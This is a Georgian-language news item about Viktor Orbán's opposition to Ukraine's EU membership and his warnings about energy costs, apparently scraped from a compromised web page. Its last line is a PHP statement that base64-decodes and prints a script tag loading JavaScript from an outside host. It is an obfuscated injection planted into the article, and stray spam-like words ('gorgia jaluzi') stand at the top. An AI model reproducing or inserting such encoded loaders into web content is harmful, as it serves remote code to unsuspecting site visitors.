gorgia
jaluzi

უნგრეთის პრემიერ-მინისტრის, ვიქტორ ორბანის განცხადებით, უნგრეთი უკრაინის ევროკავშირში გაწევრიანების წინააღმდეგია. მისი თქმით, დარწმუნებულია, რომ უკრაინის ევროკავშირში გაწევრიანების საკითხზე გამოკითხვის ჩატარებისას უნგრელები მხარს დაუჭერენ მთავრობის პოზიციას.

ვიქტორ ორბანის განცხადებით, გრძელვადიან პერსპექტივაში უკრაინა მილიონიანი ჯარის შენახვას აპირებს, რომლის უზრუნველყოფასაც ევროპა საკუთარ თავზე აიღებს, ნაცვლად იმისა, რომ დასავლეთ ევროპის ქვეყნების შეიარაღებული ძალები გააძლიერონ.

„უნგრეთს სურს, რომ უკრაინა ევროკავშირის მიღმა დარჩეს, რადგან თუ მას მივიღებთ, ის ყველა რესურსს შეიწოვს ისე, როგორც ღრუბელი იწოვს წყალს“, – განაცხადა ვიქტორ ორბანმა.

უნგრეთის პრემიერ-მინისტრმა ასევე ისაუბრა უკრაინიდან მომდინარე ენერგეტიკულ საფრთხეზე და უკმაყოფილება გამოთქვა ევროკავშირის გეგმებზე, რუსეთის ენერგორესურსებზე უარის თქმის გამო.

ვიქტორ ორბანის თქმით, თუ რუსეთიდან გაზსა და ნავთობს ვერ მიიღებენ, უნგრეთს წელიწადში დამატებით 800 მილიარდი ფორინტის გადახდა მოუწევს გაზის ალტერნატიული წყაროებიდან მისაღებად.

მისი გამოთვლით, უნგრელებს ელექტროენერგიაში ორჯერ მეტი ფულის გადახდა მოუწევთ, ხოლო გათბობის გადასახადები ოთხჯერ გაიზრდება.

203
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");